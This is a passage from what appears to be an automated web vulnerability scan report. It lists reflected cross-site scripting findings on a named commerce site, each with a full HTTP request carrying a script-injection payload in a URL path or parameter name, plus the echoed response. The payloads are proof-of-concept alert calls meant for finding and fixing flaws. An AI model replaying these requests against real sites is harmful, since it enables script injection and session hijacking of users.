<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/system/system-menus.css10c53"><script>alert(1)</script>92c043d2bd7?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.142. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d9d"><script>alert(1)</script>3ff12a53a87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules82d9d"><script>alert(1)</script>3ff12a53a87/system/system.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules82d9d"><script>alert(1)</script>3ff12a53a87/system/system.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.143. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3fba"><script>alert(1)</script>c22da2ed4f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/systema3fba"><script>alert(1)</script>c22da2ed4f5/system.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/systema3fba"><script>alert(1)</script>c22da2ed4f5/system.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.144. http://www.oscommerce-manager.com/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5d7f"><script>alert(1)</script>18ea0726c9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/system/system.cssf5d7f"><script>alert(1)</script>18ea0726c9d?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/system/system.cssf5d7f"><script>alert(1)</script>18ea0726c9d?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.145. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 105cb"><script>alert(1)</script>5dd21cebd5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules105cb"><script>alert(1)</script>5dd21cebd5f/user/user.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules105cb"><script>alert(1)</script>5dd21cebd5f/user/user.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.146. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f76f"><script>alert(1)</script>fb7b171dc58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/user2f76f"><script>alert(1)</script>fb7b171dc58/user.css?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 13:59:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 13:59:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/user2f76f"><script>alert(1)</script>fb7b171dc58/user.css?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.147. http://www.oscommerce-manager.com/modules/user/user.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a461"><script>alert(1)</script>646e21d0eab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/user/user.css3a461"><script>alert(1)</script>646e21d0eab?6 HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:00:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:00:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/modules/user/user.css3a461"><script>alert(1)</script>646e21d0eab?6')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.148. http://www.oscommerce-manager.com/order [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /order

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2e42"><script>alert(1)</script>6c47226d429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ordera2e42"><script>alert(1)</script>6c47226d429 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(0x0066)%3C/script%3Ed053e3a864d=1
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.2.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:11:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:11:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/ordera2e42"><script>alert(1)</script>6c47226d429')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.149. http://www.oscommerce-manager.com/order [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /order

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bc1b"><script>alert(1)</script>4491b6523c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order?9bc1b"><script>alert(1)</script>4491b6523c2=1 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/?8b64d%22%3E%3Cscript%3Ealert(0x0066)%3C/script%3Ed053e3a864d=1
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.2.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:10:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:10:23 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 29251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/order?9bc1b"><script>alert(1)</script>4491b6523c2=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.150. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /thank-you-purchasing-magneticone-product

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3691d"><script>alert(1)</script>633d138c7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /thank-you-purchasing-magneticone-product3691d"><script>alert(1)</script>633d138c7a HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.3.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:11:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:11:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/thank-you-purchasing-magneticone-product3691d"><script>alert(1)</script>633d138c7a')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.151. http://www.oscommerce-manager.com/thank-you-purchasing-magneticone-product [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /thank-you-purchasing-magneticone-product

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee884"><script>alert(1)</script>9096c38c85d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /thank-you-purchasing-magneticone-product?ee884"><script>alert(1)</script>9096c38c85d=1 HTTP/1.1
Host: www.oscommerce-manager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=c04ce3a5b54f17cd666936561a436137; has_js=1; __utma=31844193.1399225872.1305468130.1305468130.1305468130.1; __utmb=31844193.3.10.1305468130; __utmc=31844193; __utmz=31844193.1305468130.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:10:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:10:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 25283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/thank-you-purchasing-magneticone-product?ee884"><script>alert(1)</script>9096c38c85d=1')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.152. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3183c"><script>alert(1)</script>20375e6ddd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes3183c"><script>alert(1)</script>20375e6ddd3/oscmanager/images/menu-expanded.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes3183c"><script>alert(1)</script>20375e6ddd3/oscmanager/images/menu-expanded.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.153. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44b2"><script>alert(1)</script>3cf167b5311 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanagerc44b2"><script>alert(1)</script>3cf167b5311/images/menu-expanded.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanagerc44b2"><script>alert(1)</script>3cf167b5311/images/menu-expanded.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.154. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfe33"><script>alert(1)</script>b6c282e0484 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/imagesdfe33"><script>alert(1)</script>b6c282e0484/menu-expanded.gif HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:01:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 14:01:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 16857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr
...[SNIP]...
<a rel="nofollow" href="javascript: void(window.open('http://translate.google.com/translate?u='+escape('www.oscommerce-manager.com/themes/oscmanager/imagesdfe33"><script>alert(1)</script>b6c282e0484/menu-expanded.gif')+'&amp;langpair=en%7Cde', 'English_to_German', 'resizable,scrollbars,status'))">
...[SNIP]...

3.155. http://www.oscommerce-manager.com/themes/oscmanager/images/menu-expanded.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oscommerce-manager.com
Path:   /themes/oscmanager/images/menu-expanded.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee376"><script>alert(1)</script>241027ec1dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/oscmanager/images/menu-expanded.gifee376"><script>alert(1)</script>241027ec1dc HTTP/1.1
Host: www.oscommerce-manager.com
Proxy-Connection: keep-alive
Referer: http://www.oscommerce-manager.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf6cba6c583dc3db17176d16b553730b0=1cba0473286498bbc9e50fefc83cb0c0; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
